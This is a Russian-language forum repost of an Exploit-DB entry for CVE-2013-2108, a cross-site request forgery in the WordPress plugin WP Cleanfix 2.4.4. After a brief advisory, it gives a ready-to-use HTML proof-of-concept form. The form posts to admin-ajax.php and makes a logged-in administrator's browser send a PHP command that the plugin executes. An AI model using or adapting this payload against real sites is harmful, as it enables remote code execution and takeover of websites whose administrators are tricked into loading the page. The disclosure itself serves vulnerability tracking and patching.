Exploit WordPress Plugin WP Cleanfix - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38520
Проверка EDB
  1. Пройдено
Автор
ENIGMA IDEAS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2013-2108
Дата публикации
2013-05-16
WordPress Plugin WP Cleanfix - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/59940/info

The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WP cleanfix 2.4.4 is vulnerable; other versions may also be affected. 

SRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpCleanFixAjax" />
      <input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
Источник
www.exploit-db.com

Похожие темы